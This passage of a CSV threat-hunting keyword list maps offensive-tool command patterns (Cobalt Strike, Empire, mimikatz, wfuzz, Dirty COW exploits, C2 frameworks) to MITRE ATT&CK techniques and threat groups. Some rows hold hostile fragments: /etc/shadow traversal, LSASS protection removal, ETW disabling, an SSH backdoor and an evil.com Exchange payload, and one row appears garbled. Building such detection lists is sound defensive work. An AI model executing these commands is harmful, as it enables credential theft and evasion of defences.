Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* xpipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"* Your payload has been delivered*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -z burplog*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z file*wordlist/*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z list*nonvalid-httpwatch --basic*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 
TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range --zD 0-1 -u http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -z range*0-10 --hl 97 http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*!autoruns *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!files upload *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!handlers load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!implants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!interactive 
*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!modules load *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!processprotect *lsass.exe*","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*!put */tmp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!shell *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!tunnels 
--tcp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!use *aes256_py*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!use *reflected_assembly*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!wPkgPath!*!ak!*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*$attacker_IPlist*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*$C2_SERVER*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*$DummyServiceName*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$env:COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*$KeePassBinaryPath*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$KeePassUser*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*%APPDATA%/Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*%comspec% /k *.bat*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","0","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*%COMSPEC%*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*%SystemRoot%\\MEMORY.DMP*","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" +"*&& telnet * 2>&1 &Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tools","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*...::$index_allocation*","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*../../../../../../etc/passwd*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*../../../../../../etc/shadow*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*./*octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*./agscript *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*./awsloot *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*./awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*./Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*./c2lint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*./chisel *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*./cowpy.sh *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*./cowroot*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" +"*./dcow -s*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" +"*./Dent -*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*./dirty*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" +"*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" +"*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*./dnscat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - 
TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*./dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*./donut *.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./encryptor -f *.exe -o *.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
